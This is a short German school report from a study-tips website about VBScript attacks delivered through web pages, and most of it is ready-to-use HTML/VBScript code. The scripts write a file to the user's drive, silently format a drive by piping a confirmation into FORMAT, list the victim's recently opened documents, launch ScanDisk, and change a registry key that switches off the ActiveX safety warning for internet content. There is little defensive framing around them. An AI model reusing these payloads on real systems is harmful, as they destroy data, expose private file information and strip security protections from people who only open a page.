Lerntippsammlung Headergrafik
Linie
Abstandshalter

Suchbegriff:

VBS-Scripting Attacken - Referat



VBS-Scripting Attacken


Mit Windows und dem passenden Browser kann man viel machen.

Ist VB Scripting aktieviert so kann folgender Code extrem massive Auswirkungen habe.

Im ersten Beispiel handelt es sich um den Code der es möglich macht Dateien auf der Festplatte zu erschaffen. Durch diese Möglichkeit der Manipulation eines Systemes durch diesen Code kann man selbst Dateien wie die Registry oder die Autoexe überschreiben.

<HTML>

<SCRIPT LANGUAGE="VBSCRIPT">

Set fs = CreateObject("Scripting.FileSystemObject") Set datei = fs.CreateTextFile("C:\VIRUS.TXT", True) datei.WriteLine("Hi! Wie geht's? Ich bin ein kleines Virus ;-)!") datei.Close </SCRIPT> Hi! Wie geht's? Auf Deiner Festplatte ist nun ein kleines Virus ;-)!

</HTML>

Im zweiten Beispiel wird ein 2 Zeilen Code gezeigt mit dem es möglich ist ohne erneute Nachfrage eine Diskette zu formatieren. Die gleiche Prozedur wäre mit einer Fesplatte mit Namen D-Z möglich. Auch Wechsellaufwerke können so formatiert werden.

<HTML>

<SCRIPT LANGUAGE="VBSCRIPT">

set wshell = CreateObject("WScript.Shell") befehl = "START /M COMMAND.COM /C ECHO J | FORMAT A: > NUL" wshell.run(befehl) </SCRIPT> Die Diskette in Laufwerk A: wird gerade formatiert...

</HTML>

Dieser Script zeigt an welche Dateien gerade bearbeitet werden oder bearbeitet wurden. Es werden die Dokumente im Dokument Ordner angezeigt.

<HTML>

<H1>Woran Du so gerade arbeitest ...</H1> <P>Der Inhalt deines Dokumentenordners: </P>

<SCRIPT LANGUAGE="VBSCRIPT">

Set fs = CreateObject("Scripting.FileSystemObject") set wshell = CreateObject("WScript.Shell") dokus = WShell.SpecialFolders("Recent") set ordner = fs.GetFolder(dokus) DateienListen ordner sub DateienListen(ordnerobject) dim ff, element set ff = ordnerobject.Files For Each element in ff document.Writeln "<H4>" + element.name + "</H4>" set scut = WShell.CreateShortcut(element.path) ziel = scut.TargetPath document.Writeln "Die Verknüpfung verweist auf: " + ziel next end sub </SCRIPT> <H2>fertig. </H2>

</HTML>


Hier wird Scandisk gestartet

<HTML>

<SCRIPT LANGUAGE="VBSCRIPT">

set wshell = createObject("WScript.Shell") befehl = "SCANDSKW.EXE /N /A" wshell.run(befehl)

</SCRIPT>

Scandisk wird zur Fehlersuche gestartet ... </HTML>


Die Warnung von Aktiv X ausschalten

<HTML>

<SCRIPT LANGUAGE="VBSCRIPT">

Set WShell = CreateObject("wscript.Shell") key="HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1201" WShell.RegWrite key, 0, "REG_DWORD" document.writeln "Unsichere aktive Elemente aus dem Internet haben jetzt freien Zugang!"

</SCRIPT>

</HTML>

Quelle(n) für dieses Referat: keine Angaben



Kommentare zum Referat VBS-Scripting Attacken: